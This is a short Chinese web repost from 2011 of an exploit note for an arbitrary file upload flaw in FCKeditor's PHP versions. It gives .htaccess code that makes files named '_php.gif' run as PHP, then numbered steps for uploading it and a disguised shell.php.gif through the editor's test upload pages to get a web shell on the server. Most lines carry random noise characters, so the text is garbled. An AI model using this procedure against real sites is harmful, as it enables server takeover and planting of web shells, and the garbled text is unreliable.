FCKeditor所有php版本Upload上传漏洞" t9 w$ y; T) J/ ? F( r( d, Q3 `
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
- n: I+ w2 m# R" Z! Q8 P7 V$ `减小字体 增大字体
( ^* { F2 v0 J: e[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability3 w, b4 l! z5 l! E- X
[+] Date: 2011
. u# o J6 U ?2 c[+] Author : sinesafe.cn
' G# `$ @1 J/ ?* @[+] Website : WwW.sinesafe.cn Q! R3 ~ o7 G6 ^* P' b! c: f
———————————————————
+ z% j5 X! l9 {( p& X& a0 D1.create a htaccess file:1 l8 ^1 g" k, {. w% B4 {
code: ^' e9 L& y( Z7 X. I% k
<FilesMatch “_php.gif”># _: c* ~" V2 p2 l& y% J5 K0 f3 {
SetHandler application/x-httpd-php$ n+ E8 w V& l
</FilesMatch>: c! K( r* P ~5 v5 z3 i
P5 {+ C5 @/ E, g; E2.Now upload this htaccess with FCKeditor.* y% t6 j: z4 n; `3 b7 K, w5 x
+ a8 ]3 I/ ]& v% r3 D1 M
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html4 w, d0 P9 I+ V/ Q4 p/ G" S
T( n) L; p7 [# k$ _* O9 R$ g/ g( r
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html$ X3 K1 c2 D5 ~- `
, x) j' ?: u: H9 q) @9 j. {
———————————————————————————————-
}$ O5 T( w% K {) U3.Now upload shell.php.gif with FCKeditor.' P2 S5 H, _& C8 R3 v0 d
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
( V( a7 D1 E6 V- q3 c9 `) [% f5.http://www.sinesafe.cn/anything/shell_php.gif
/ I+ P. ? Z. c }: r; K# {; O6.Now shell is available from server. |
, B h4 t" @4 B
" I2 L0 F7 b4 [* ?7 n
, Z- ?8 }5 N3 N$ J4 X9 g5 s, l P/ g |